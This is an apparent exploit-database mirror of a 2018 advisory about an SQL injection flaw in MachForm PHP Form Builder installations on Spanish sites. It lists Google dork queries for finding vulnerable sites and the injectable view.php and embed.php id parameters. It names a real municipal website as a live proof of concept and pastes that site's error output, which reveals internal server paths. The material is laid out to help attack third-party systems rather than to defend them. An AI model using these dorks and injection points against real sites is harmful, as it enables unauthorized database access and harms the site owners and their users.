Creado por Crafi&Deso MachForm PHP Form Builder Spain SQL Injection Vulnerability

| CVE | Category | Price | Severity |
|---|---|---|---|
| | CWE-89 | Not specified | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Crafi & Deso | High | Remote | 2018-06-22 |

| CVSS | EPSS | EPSSP |
|---|---|---|
| CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N | 0.66292 | 0.89748 |


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060229

Below is a copy:

Creado por Crafi&Deso MachForm PHP Form Builder Spain SQL Injection Vulnerability
#################################################################################################

# Exploit Title : Creado por Crafi&Deso MachForm PHP Form Builder Spain SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : machform.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks : 

intext:''Creado por CRAFI&DESO''

intext:''Creado por: CRAFI&DESO  Copyright indefinido - Diseo e imagen''

intext:''MachForm - PHP Form Builder''

# Exploits : 

/formulario/view.php?id=[SQL Inj]
/formulario/embed.php?id=[SQL Inj]

# Admin Panel Login Path : /formulario/

#################################################################################################

# Example Site :  sanisidro.es/formulario/view.php?id=5%27 => Proof of Concept  => archive.is/4ylLc

# Error in SQL Database : 

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1561

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1643

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1654

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1704

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1891

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1974

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 1985

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 2041

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 2210

Deprecated: Assigning the return value of new by reference is deprecated in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php on line 2270

Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/db-core.php on line 11

Warning: Cannot modify header information - headers already sent by (output started at /homepages/10/d288254394/htdocs/ayuntamiento/formulario/includes/view-functions.php:1561) in /homepages/10/d288254394/htdocs/ayuntamiento/formulario/view.php on line 89

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
